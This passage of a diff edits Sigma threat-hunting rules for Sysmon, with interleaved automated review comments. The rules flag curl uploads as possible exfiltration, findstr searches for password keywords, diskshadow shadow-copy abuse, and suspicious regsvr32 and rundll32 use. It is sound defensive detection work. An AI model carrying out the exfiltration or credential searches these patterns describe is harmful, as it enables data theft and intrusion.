\MsMpEng.exe + # Microsoft Gaming Services filter3: SourceImage|startswith: C:\Program Files\WindowsApps\ SourceImage|endswith: \GamingServices.exe + # Process Explorer filter4: SourceImage|endswith: - \PROCEXP64.EXE - \PROCEXP.EXE + # VMware Tools filter5: SourceImage|startswith: C:\ProgramData\VMware\VMware Tools\ SourceImage|endswith: \vmtoolsd.exe + # Antivirus and EDR agents filter6: SourceImage|startswith: - C:\Program Files\ - C:\Program Files (x86)\ SourceImage|contains: Antivirus filter_nextron: + # SourceImage|startswith: 'C:\Windows\Temp\asgard2-agent\' # Can be a manual THOR installation SourceImage|endswith: - \thor64.exe - \thor.exe 
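Review bot: The new `# Antivirus and EDR agents` comment above `filter6` overstates what the filter matches: it excludes any `SourceImage` under `Program Files` or `Program Files (x86)` whose path contains the substring `Antivirus`, so EDR agents without that word are not covered and anything with that word anywhere in its path is, regardless of vendor. A comment that names the actual predicate is safer for whoever tunes the rule, e.g. `# Program Files binaries whose path contains "Antivirus" (broad substring match)`. Similarly, the commented-out `SourceImage|startswith` under `filter_nextron` leaves THOR excluded by file name alone; stating that directly, `# Matched by name only: THOR may run from arbitrary paths during manual scans`, makes the widened exclusion explicit rather than implied by a disabled line. The `detection` block's `condition` is outside this hunk.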
@@ -74,6 +80,7 @@ detection: - \AppData\Local\Temp\ - \vs_bootstrapper_ GrantedAccess: '0x1410' + # Generic Filter for 0x1410 filter (caused by so many programs like DropBox updates etc.) filter_generic: SourceImage|startswith: - C:\Program Files\ diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml index 1d63e087d..4223fe410 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml @@ -1,11 +1,10 @@ title: Dynamic .NET Compilation Via Csc.EXE - Hunting id: acf2807c-805b-4042-aab9-f86b6ba9cb2b related: - - id: dcaa3f04-70c3-427a-80b4-b870d73c94c4 - type: derived + - id: dcaa3f04-70c3-427a-80b4-b870d73c94c4 + type: derived status: experimental -description: Detects execution of "csc.exe" to compile .NET code. Attackers often - leverage this to compile code on the fly and use it in other stages. +description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. references: - https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/ - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf @@ -27,10 +26,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \csc.exe - CommandLine|contains: /noconfig /fullpaths @ + CommandLine|contains: /noconfig /fullpaths @ condition: process_creation and selection falsepositives: - - Many legitimate applications make use of dynamic compilation. Use this rule - to hunt for anomalies + - Many legitimate applications make use of dynamic compilation. Use this rule to hunt for anomalies level: medium ruletype: Sigma 
diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_download.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_download.yml index d5a5e26fd..ecd5ebd1c 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_download.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_download.yml @@ -1,10 +1,10 @@ title: File Download Via Curl.EXE id: 9a517fca-4ba3-4629-9278-a68694697b81 related: - - id: bbeaed61-1990-4773-bf57-b81dbad7db2d - type: derived - - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 - type: derived + - id: bbeaed61-1990-4773-bf57-b81dbad7db2d # Basic curl execution + type: derived + - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 # Suspicious curl execution + type: derived status: test description: Detects file download using curl.exe references: @@ -25,18 +25,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - Product: The curl executable + - Image|endswith: \curl.exe + - Product: The curl executable selection_remote: - CommandLine|contains: - - ' -O' + CommandLine|contains: + - ' -O' # covers the alias for --remote-name and --output - --remote-name - --output condition: process_creation and (all of selection_*) falsepositives: - Scripts created by developers and admins - Administrative activity - - The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific - file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt " + - The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt " level: medium ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_execution.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_execution.yml index a4e212c83..a220a75e3 100644 
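Review bot: The new comment on `' -O'` (`covers the alias for --remote-name and --output`) is only true because Sigma string matching is case-insensitive: `-O` is the short form of `--remote-name`, while `--output`'s short form is lower-case `-o`. Making that dependency explicit prevents someone later "correcting" the comment or switching the entry to a case-sensitive `re` modifier and silently losing `-o`, e.g. `# -O = --remote-name; case-insensitive matching also covers -o = --output`. The pattern also has a leading space but no trailing delimiter, so it matches combined short flags such as ` -OL` as well, which is fine for a hunting rule but worth a word in the same comment.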
--- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_execution.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_execution.yml @@ -1,11 +1,10 @@ title: Curl.EXE Execution id: bbeaed61-1990-4773-bf57-b81dbad7db2d related: - - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 - type: derived + - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 # Suspicious curl execution + type: derived status: test -description: Detects a curl process start on Windows, which could indicates a file - download from a remote location or a simple web request to a remote server +description: Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server references: - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464 author: Florian Roth (Nextron Systems) @@ -24,8 +23,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \curl.exe - - Product: The curl executable + - Image|endswith: \curl.exe + - Product: The curl executable condition: process_creation and selection falsepositives: - Scripts created by developers and admins diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml index 3bf1fb201..580d2f983 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml 
@@ -1,8 +1,7 @@ title: Potential Data Exfiltration Via Curl.EXE id: 00bca14a-df4e-4649-9054-3f2aa676bc04 status: test -description: Detects the execution of the "curl" process with "upload" flags. Which - might indicate potential data exfiltration +description: Detects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration references: - https://twitter.com/d1r4c/status/1279042657508081664 - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76 @@ -25,17 +24,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - Product: The curl executable + - Image|endswith: \curl.exe + - Product: The curl executable selection_cli: - - CommandLine|contains: - - ' --form' - - ' --upload-file ' - - ' --data ' - - ' --data-' - - CommandLine|re: \s-[FTd]\s + - CommandLine|contains: + - ' --form' # Also covers the "--form-string" + - ' --upload-file ' + - ' --data ' + - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode" + - CommandLine|re: \s-[FTd]\s # We use regex to ensure a case sensitive argument detection filter_optional_localhost: - CommandLine|contains: + CommandLine|contains: - ://localhost - ://127.0.0.1 condition: process_creation and (all of selection_* and not 1 of filter_optional_*) diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml index 9ddae58dc..b0de5f4be 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml 
@@ -21,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_curl: - - Image|endswith: \curl.exe - - Product: The curl executable + - Image|endswith: \curl.exe + - Product: The curl executable selection_opt: - CommandLine|contains: + CommandLine|contains: - ' -A ' - ' --user-agent ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml index 46cc2c23e..9f3385553 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml @@ -1,8 +1,7 @@ title: ClickOnce Deployment Execution - Dfsvc.EXE Child Process id: 241d52b5-eee0-49d0-ac8a-8b9c15c7221c status: experimental -description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment - execution. +description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution. references: - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 author: Nasreddine Bencherchali (Nextron Systems) @@ -24,7 +23,6 @@ detection: Image|endswith: \AppData\Local\Apps\2.0\ condition: process_creation and selection falsepositives: - - False positives are expected in environement leveraging ClickOnce deployments. - An initial baselining is required before using this rule in production. + - False positives are expected in environement leveraging ClickOnce deployments. An initial baselining is required before using this rule in production. level: medium ruletype: Sigma 
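Review bot: The context line `Image|endswith: \AppData\Local\Apps\2.0\` in the `proc_creation_win_dfsvc_child_processes.yml` hunk ends its pattern with a directory separator; an executable path never ends in `\`, so if the modifier really is `endswith` the selection can never match and the rule is effectively dead. The collapsed rendering here may have dropped part of the line, so this needs confirming against the full rule; if confirmed, `Image|contains: \AppData\Local\Apps\2.0\` is the form that matches ClickOnce application binaries under that directory. The rest of the `selection` (the parent-image constraint) is outside this hunk.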
diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml index 1844dd011..72b643b70 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml @@ -1,18 +1,16 @@ title: Diskshadow Child Process Spawned id: 56b1dde8-b274-435f-a73a-fb75eb81262a related: - - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 - type: similar - - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f - type: similar - - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 - type: similar - - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 - type: similar + - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location + type: similar + - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution + type: similar + - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE + type: similar + - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution + type: similar status: experimental -description: Detects any child process spawning from "Diskshadow.exe". This could - be due to executing Diskshadow in interpreter mode or script mode and using the - "exec" flag to launch other applications. +description: Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications. references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration 
diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml index cd03694db..dbcb67087 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml 
@@ -1,20 +1,17 @@ title: Diskshadow Script Mode Execution id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 related: - - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 - type: similar - - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f - type: similar - - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 - type: similar - - id: 56b1dde8-b274-435f-a73a-fb75eb81262a - type: similar + - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location + type: similar + - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution + type: similar + - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE + type: similar + - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned + type: similar status: test -description: 'Detects execution of "Diskshadow.exe" in script mode using the "/s" - flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow - copies on the systems. Investigate the content of the scripts and its location. - - ' +description: | + Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location. references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration @@ -36,10 +33,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: diskshadow.exe - - Image|endswith: \diskshadow.exe + - OriginalFileName: diskshadow.exe + - Image|endswith: \diskshadow.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '/s ' - '-s ' condition: process_creation and (all of selection_*) 
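Review bot: The reflowed `description` block keeps a tense/agreement slip in its second and third sentences ("scripts that deleted the shadow copies", "the scripts and its location"), which the commit rewrote without correcting. Suggest `Attackers often abuse "diskshadow" to execute scripts that delete the shadow copies on the systems. Investigate the content of the scripts and their location.` for those two sentences. The `related` entries now carry the peer rule titles as comments, which is helpful; the rest of this hunk is indentation only.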
diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml index 299868a38..2456da63a 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml @@ -1,8 +1,7 @@ title: Potential Password Reconnaissance Via Findstr.EXE id: 1a0f6f16-2099-4753-9a02-43b6ac7a1fa5 status: experimental -description: Detects command line usage of "findstr" to search for the "passwords" - keyword in a variety of different languages +description: Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages references: - https://steflan-security.com/windows-privilege-escalation-credential-harvesting/ - https://adsecurity.org/?p=2288 @@ -21,19 +20,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \findstr.exe - - OriginalFileName: FINDSTR.EXE + - Image|endswith: \findstr.exe + - OriginalFileName: FINDSTR.EXE selection_cli: - CommandLine|contains: - - "contrase\xF1a" - - "has\u0142o" - - heslo - - parola - - passe - - passw - - senha - - senord - - "\u5BC6\u78BC" + CommandLine|contains: + - contraseña # Spanish + - hasło # Polish + - heslo # Czech + - parola # Italian + - passe # French + - passw # German, English + - senha # Portuguese + - senord # Swedish + - 密碼 # Cantonese condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_net_quic.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_net_quic.yml index 9a7e7d7c5..69844d6d2 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_net_quic.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_net_quic.yml 
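Review bot: In `selection_cli` the new comment `# Cantonese` on `密碼` labels a spoken language rather than the script actually matched; `密碼` is the Traditional Chinese written form, and the Simplified form `密码` is not in the list, so `findstr` searches on zh-CN systems are not covered. Suggest `- 密碼 # Chinese (Traditional)` and an additional `- 密码 # Chinese (Simplified)` entry. Replacing the `\xF1`/`\u0142`/`\u5BC6` escapes with literal characters is fine as long as the file is stored as UTF-8 (the YAML default), which cannot be confirmed from the diff alone.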
@@ -1,11 +1,10 @@ title: SMB over QUIC Via Net.EXE id: 2238d337-42fb-4971-9a68-63570f2aede4 related: - - id: 6df07c3b-8456-4f8b-87bb-fe31ec964cae - type: similar + - id: 6df07c3b-8456-4f8b-87bb-fe31ec964cae + type: similar status: experimental -description: Detects the mounting of Windows SMB shares over QUIC, which can be an - unexpected event in some enterprise environments. +description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments. references: - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md - https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/ @@ -24,14 +23,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - Image|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains: /TRANSPORT:QUIC + CommandLine|contains: /TRANSPORT:QUIC condition: process_creation and (all of selection_*) falsepositives: - Administrative activity diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml index 9e99eb934..f31e26ff1 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml 
@@ -1,14 +1,9 @@ title: Suspicious New Instance Of An Office COM Object id: 9bdaf1e9-fdef-443b-8081-4341b74a7e28 status: test -description: 'Detects an svchost process spawning an instance of an office application. - This happens when the initial word application creates an instance of one of the - Office COM objects such as ''Word.Application'', ''Excel.Application'', etc. - - This can be used by malicious actors to create malicious Office documents with - macros on the fly. (See vba2clr project in the references) - - ' +description: | + Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc. + This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references) references: - https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic - https://github.com/med0x2e/vba2clr diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml index ce82e042a..b58a2847b 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml 
@@ -1,8 +1,7 @@ title: Unusually Long PowerShell CommandLine id: d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6 status: test -description: Detects unusually long PowerShell command lines with a length of 1000 - characters or more +description: Detects unusually long PowerShell command lines with a length of 1000 characters or more references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse author: oscd.community, Natalia Shornikova @@ -21,16 +20,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_powershell: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Description: Windows Powershell - - Product: PowerShell Core 6 + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Description: Windows Powershell + - Product: PowerShell Core 6 selection_length: - CommandLine|re: .{1000,} + CommandLine|re: .{1000,} condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml index 29da1abb3..8a4534acc 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml 
@@ -1,15 +1,10 @@ title: Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace id: ad856965-f44d-42a8-945e-bbf7bd03d05a status: experimental -description: 'Detects the invocation of PowerShell commands with references to classes - from the "System.Security.Cryptography" namespace. - - The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly - encryption and decryption. - +description: | + Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. + The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion. - - ' references: - https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0 - https://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html @@ -30,16 +25,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet_namespace: - CommandLine|contains: System.Security.Cryptography. + CommandLine|contains: System.Security.Cryptography. selection_cmdlet_classes: - CommandLine|contains: + CommandLine|contains: - .AesCryptoServiceProvider - .DESCryptoServiceProvider - .DSACryptoServiceProvider 
@@ -49,7 +44,6 @@ detection: - .TripleDESCryptoServiceProvider condition: process_creation and (all of selection_*) falsepositives: - - Classes are legitimately used, but less so when e.g. parents with low prevalence - or decryption of content in temporary folders. + - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders. level: medium ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml index 7594cac8d..8ff920d0b 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml @@ -1,8 +1,7 @@ title: Import New Module Via PowerShell CommandLine id: 4ad74d01-f48c-42d0-b88c-b31efa4d2262 status: experimental -description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets - to the current PowerShell session +description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session references: - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.3 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-5.1 
@@ -21,26 +20,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Import-Module ' - 'ipmo ' filter_main_vsstudio: ParentImage|contains: - :\Program Files\WindowsApps\Microsoft.WindowsTerminal_ - :\Windows\System32\cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - :\Program Files\Microsoft Visual Studio\ - Tools\Microsoft.VisualStudio.DevShell.dll condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Depending on the environement, many legitimate scripts will import modules inline. - This rule is targeted for hunting purposes. + - Depending on the environement, many legitimate scripts will import modules inline. This rule is targeted for hunting purposes. level: low ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml index dade8d988..6ef508413 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml 
@@ -1,16 +1,12 @@ title: Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly id: ce2c44b5-a6ac-412a-afba-9e89326fa972 related: - - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e - type: similar + - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e + type: similar status: experimental -description: 'Detects execution of regsvr32 with the silent flag and no other flags - on a DLL located in an uncommon or potentially suspicious location. - - When Regsvr32 is called in such a way, it implicitly calls the DLL export function - ''DllRegisterServer''. - - ' +description: | + Detects execution of regsvr32 with the silent flag and no other flags on a DLL located in an uncommon or potentially suspicious location. + When Regsvr32 is called in such a way, it implicitly calls the DLL export function 'DllRegisterServer'. references: - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ - https://www.virustotal.com/gui/file/288fc4f954f98d724e6fab32a89477943df5c0e9662cb199a19b90ae0c63aebe/detection 
@@ -31,33 +27,33 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_image: - - Image|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - Image|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_cmdline: - CommandLine|contains: + CommandLine|contains: - ' /s ' - ' /e ' filter_main_paths: - - CommandLine|contains: - - :\Program Files (x86) - - :\Program Files\ - - :\Windows\System32\ - - :\Windows\SysWOW64\ - - CurrentDirectory|contains: - - :\Program Files (x86) - - :\Program Files\ - - :\Windows\System32\ - - :\Windows\SysWOW64\ + - CommandLine|contains: + - :\Program Files (x86) + - :\Program Files\ + - :\Windows\System32\ + - :\Windows\SysWOW64\ + - CurrentDirectory|contains: + - :\Program Files (x86) + - :\Program Files\ + - :\Windows\System32\ + - :\Windows\SysWOW64\ filter_main_other_flags: - CommandLine|contains: + # Note: We filter other flags to keep the logic of the rule + CommandLine|contains: - ' /i:' - '/U ' filter_main_rpcproxy: ParentCommandLine|endswith: :\Windows\System32\RpcProxy\RpcProxy.dll - CommandLine: regsvr32 /s rpcproxy.dll + CommandLine: regsvr32 /s rpcproxy.dll condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Legitimate usage as part of application installation, but less likely from e.g. - temporary paths. + - Legitimate usage as part of application installation, but less likely from e.g. temporary paths. level: medium ruletype: Sigma diff --git a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml index 13766bd22..af83eb631 100644 --- a/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml +++ b/sigma/sysmon/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml 
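Review bot: The new comment on `filter_main_other_flags` (`# Note: We filter other flags to keep the logic of the rule`) states that the flags are excluded but not why, which is the part a maintainer tuning the filter needs. Suggest `# Note: "/i:" hands control to DllInstall and "/u" to DllUnregisterServer; both are excluded so the rule only covers the bare "/s" form that implicitly calls DllRegisterServer`. This ties the filter back to the rule title and description, which the current wording does not.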
@@ -1,14 +1,11 @@ title: Rundll32.EXE Calling DllRegisterServer Export Function Explicitly id: d81a9fc6-55db-4461-b962-0e78fea5b0ad related: - - id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed - type: similar + - id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed # Renamed rundll32 + type: similar status: experimental -description: 'Detects when the DLL export function ''DllRegisterServer'' is called - in the commandline by Rundll32 explicitly where the DLL is located in a non-standard - path. - - ' +description: | + Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path. references: - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ - https://www.virustotal.com/gui/file/94816439312563db982cd038cf77cbc5ef4c7003e3edee86e2b0f99e675ed4ed/behavior @@ -28,21 +25,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_image: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cmdline: - CommandLine|contains: DllRegisterServer + CommandLine|contains: DllRegisterServer filter_main_legit_paths: - CommandLine|contains: + CommandLine|contains: - :\Program Files (x86) - :\Program Files\ - :\Windows\System32\ - :\Windows\SysWOW64\ condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Legitimate usage as part of application installation, but less likely from e.g. - temporary paths. - - Not every instance is considered malicious, but this rule will capture the malicious - usages. + - Legitimate usage as part of application installation, but less likely from e.g. temporary paths. + - Not every instance is considered malicious, but this rule will capture the malicious usages. level: medium ruletype: Sigma 
